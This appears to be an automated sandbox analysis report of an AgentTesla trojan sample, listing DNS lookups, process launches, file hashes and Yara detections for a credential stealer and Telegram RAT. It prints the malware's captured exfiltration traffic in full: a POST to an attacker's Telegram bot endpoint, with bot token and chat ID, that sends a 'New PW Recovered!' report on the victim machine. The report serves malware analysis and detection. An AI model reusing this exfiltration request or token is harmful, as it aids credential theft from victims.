Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 4, 2022 14:37:54.344527006 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f0b | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | - | CNAME (Canonical name) | IN (0x0001)
May 4, 2022 14:38:04.768125057 CEST | 8.8.8.8 | 192.168.2.4 | 0x9334 | No error (0) | api.telegram.org | - | 149.154.167.220 | A (IP address) | IN (0x0001)
• api.telegram.org

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49768 | 149.154.167.220 | 443 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Timestamp | kBytes transferred | Direction | Data
2022-05-04 12:38:05 UTC | 0 | OUT | POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
Host: api.telegram.org
Content-Length: 754
Expect: 100-continue
Connection: Keep-Alive
2022-05-04 12:38:05 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-05-04 12:38:05 UTC | 0 | OUT | Data Ascii:
-----------------------------8da2ddf8401560c
Content-Disposition: form-data; name="chat_id"

1131810225
-----------------------------8da2ddf8401560c
Content-Disposition: form-data; name="caption"

New PW Recovered!

User Name: user/061544
OSFull
2022-05-04 12:38:05 UTC | 1 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 04 May 2022 12:38:05 GMT
Content-Type: application/json
Content-Length: 606
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
{"ok":true,"result":{"message_id":11954,"from":{"id":1698102386,"is_bot":true,"first_name":"hyacith","username":"ugochibot"},"chat":{"id":1131810225,"first_name":"uwe","last_name":"Karen","type":"private"},"date":1651667885,"document":{"file_name":"user-061544 2022-05-04 03-05-05.html","mime_type":"text/html","file_id":"BQACAgEAAxkDAAIusmJyc62WHLhzqejVctcsRLOLg5xoAAI1AgACduCZRwoWHQEMSu5XJAQ","file_unique_id":"AgADNQIAAnbgmUc","file_size":184},"caption":"New PW Recovered!\n\nUser Name: user/061544\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


Target ID: 0
Start time: 14:37:19
Start date: 04/05/2022
Path: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe"
Imagebase: 0xee0000
File size: 689664 bytes
MD5 hash: 5D5F37A7CF3A9FF4277B3A9DC2C4B9D2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.318963190.0000000003471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 9
Start time: 14:37:44
Start date: 04/05/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase: 0xa50000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation: high

Target ID: 14
Start time: 14:38:06
Start date: 04/05/2022
Path: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
Imagebase: 0x550000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Antivirus matches:
• Detection: 0%, Virustotal
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: high

Target ID: 15
Start time: 14:38:07
Start date: 04/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 16
Start time: 14:38:15
Start date: 04/05/2022
Path: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe"
Imagebase: 0x600000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 17
Start time: 14:38:16
Start date: 04/05/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff647620000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly